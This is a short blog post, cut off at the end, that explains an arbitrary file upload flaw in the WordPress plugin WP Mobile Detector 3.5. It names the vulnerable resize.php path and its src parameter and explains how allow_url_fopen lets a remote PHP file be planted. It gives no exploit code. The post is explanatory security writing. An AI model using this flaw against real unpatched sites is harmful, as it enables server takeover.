Showing posts from October, 2016

Demonstrating WordPress exploits: WP Mobile Detector 3.5

Several months ago a very popular WordPress plugin that helps you present a mobile friendly version of your site was found to have a large security hole. The plugin had a bug in it that allowed anyone to upload and execute arbitrary files.

If you go to /wp-content/plugins/3.5/resize.php on a website with the unpatched plugin installed, the script looks for a src query parameter and copies that file path to a directory in its cache. Due to a PHP setting (allow_url_fopen), which is default on, that allows you to specify a URL as a file path, this opens the door to upload an executable PHP file to the server. Exploiting that is trivial as demonstrated in this BugReplay video.

For a little bit of background, WordPress accounts for about 26% of websites on the internet. Plugins for WordPress are bundles of source code that add functionality to your blog/site. They are installed typically by uploading a zip file through the admin panel.

You are essentially relying on third party programmer…